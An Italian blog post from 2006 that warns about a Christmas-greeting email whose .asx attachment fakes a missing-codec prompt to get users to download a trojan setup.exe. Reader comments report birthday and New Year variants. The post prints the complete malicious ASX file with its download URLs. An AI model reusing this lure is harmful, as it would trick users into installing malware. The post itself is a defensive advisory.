blogo, informazione indipendente
Logo Blogosfere

Il video di Babbo Natale è un Malware

Gianni Amato avatar Mercoledì 27 Dicembre 2006, 13:15 in Malware, News di Gianni Amato

Alcuni giorni fa Adriano mi segnala la presenza di un nuovo malware che si spaccia per un file di codec che promette la corretta visualizzazione del video natalizio che arriva come allegato al messaggio di auguri tramite posta elettronica, stile PIO12.

Ecco il messaggio:

Subject: Babbo... natale??

Salve a tutti,
vi mando questo video davvero divertente,
con tantissimi auguri per un felice natale, buone feste e ottimo anno
nuovo!

Allegato: u_naltronatale.asx (1K)

Una volta scaricato ed eseguito con Windows MediaPlayer il file u_naltronatale.asx viene visualizzato il seguente messaggio:

img_asx.gif

Ovviamente non verrà scaricato un codec ma un file eseguibile Setup.exe con una icona simile al file di installazione dei codec. Di seguito l'icona dell'allegato con estensione .ASX e l'eseguibile:

 trojan_asx.PNG

Cosa contiene il file u_naltronatale.asx

<ASX version="3.0">
<ENTRY>
<TITLE>Impossibile Trovare il Codec</TITLE>
<REF href="http://www.codecsnet.biz/file.avi"/>
<DURATION VALUE="60:00"/>
<BANNER href="http://www.codecsnet.biz/img.gif">
<ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT>
<MOREINFO href="http://www.codecsnet.biz/setup.exe" />
</BANNER>
</ENTRY>
</ASX>

Il file Setup.exe è compresso con exe32pack 1.42 prodotto da SteelBytes

exe32pack_compress.PNG

Effetua delle chiamate alle API di Windows per la connessione remota e per installarsi nella macchina della vittima

ApiTroj.PNG

Al momento non tutti gli antivirus sono in grado di rilevare il malware. Di seguito uno screenshot della scansione online su VirusTotal

(Clicca sull'immagine per ingrandirla)
virus_total_asx.PNG

Fate attenzione agli allegati che arrivano con i messaggi di auguri e tenete sempre aggiornato il vostro software antivirus.

Vedi anche: Regali e auguri da evitare: Christmas.exe e Cartoline Virtuali

11
11 commenti
11
15 Feb 2007
alle 19:32

Gianni Amato

Prova con questo tool webdesk_destroy

10
15 Feb 2007
alle 13:39

Cristian

anke a me è arrivato da e-mail che conosco. un mio amico ha installato il codec ma come si può fare a debbellarlo?

9
12 Feb 2007
alle 21:02

luca

Anche a me è arrivato; non avendo rilevato virus l'ho aperto con winamp ma il video era nero: cioè scorreva ma non c'erano ne' immagini ne' suono. Nessuna richiesta di download di codec.

Sapete se è pericoloso?

Grazie

Luca

8
11 Feb 2007
alle 10:57

Toti

anche a me è arrivata una mail con testo:
" Il video del mio compleanno,
indovina chi e' la persona che mi sta a fianco? "
e allegato un file "compleanno.asx". Uso AVG e lo ha ricevuto tranquillamente

7
09 Feb 2007
alle 13:44

Rob

Arrivato anche a me allegato alla mail di un collega. Tra l'altro su una casella postale che uso solo per lavoro e dove finora, da molti anni, non erano mai arrivati virus ne spam. Ci ho fatto una scansione con AVG e non mi ha segnalato nulla. Quindi fidandomi l'ho avviato con WMP ma poi non mi ha chiesto nessun codec e sembra non ci siano problemi. Bho! Cmq è davvero incredibile! mai successo prima!

6
09 Feb 2007
alle 13:42

Rob

Arrivato anche a me allegato alla mail di un collega. Tra l'altro su una casella postale che uso solo per lavoro e dove finora, da molti anni, non erano mai arrivati virus ne spam. Ci ho fatto una scansione con AVG e non mi ha segnalato nulla. Quindi fidandomi l'ho avviato con WMP ma poi non mi ha chiesto nessun codec e sembra non ci siano problemi. Bho! Cmq è davvero incredibile! mai successo prima!

5
09 Feb 2007
alle 11:04

Andrea

Oggi mi è arrivata una variante dell'email: Compleanno. Passate le feste, per renderlo credibile utilizzano il compleanno. il testo dell'email ricalca gli altri: "Il video del mio compleanno, indovina chi e' la persona che mi sta a fianco? ". Stesso video con richiesta di installazione codec. Mi chiedo in quanti ci cascheranno?
Ciao

4
08 Feb 2007
alle 15:18

andea

proprio oggi mi è arrivata una email con un allegato non conoscevo la trappola cmq il formato dell'allegato: il mio capodanno.asx mi ha insospettito eppoi diceva indovina chi ho accanto.....ma navigando in rete ho scoperto che è un virus...che palle...ma la gente non ha da fare altro che andare a molestare noi poveri utenti di internet?
tempo fa da un sito mi richiedevano di installare un codec bè l'ho fatto sembrava un sito attendibile mcrosoft ecc ecc mah ho nod32 antivirus e x ora mi ha difeso bene spero continui a fare il suo dovere!!boh mah intanto faccio una scansione profonda....

3
07 Feb 2007
alle 11:51

ste

anche a me è arrivato! e ci sono cascata perchè mi è arrivato nella casella di posta desiderata e per di più dall'indirizzo di un mio conoscente facente parte dei miei contatti!!!

attenzione!

2
31 Gen 2007
alle 09:36

Diego

A me e' arrivato il messaggio "Filmato Capodanno" il cui testo era "Il video del mio compleanno, indovina chi e' la persona che mi sta a fianco?" contenente un filmato .asx che una volta aperto richiedeva di scaricare il codec.

1
30 Dic 2006
alle 08:20

Carlo

Nonostante abbia più volte effettuato la scansione dei virus ancora non sono riuscito a debellare il famigerato virus che manda gli auguri di natale in mia vece con il famigerato allegato video
Come posso fare per cancellare questo virus?

Lascia il tuo commento

Accedi con Facebook Esci da Facebook

Attendere la pubblicazione del commento
Post in evidenza su Blogosfere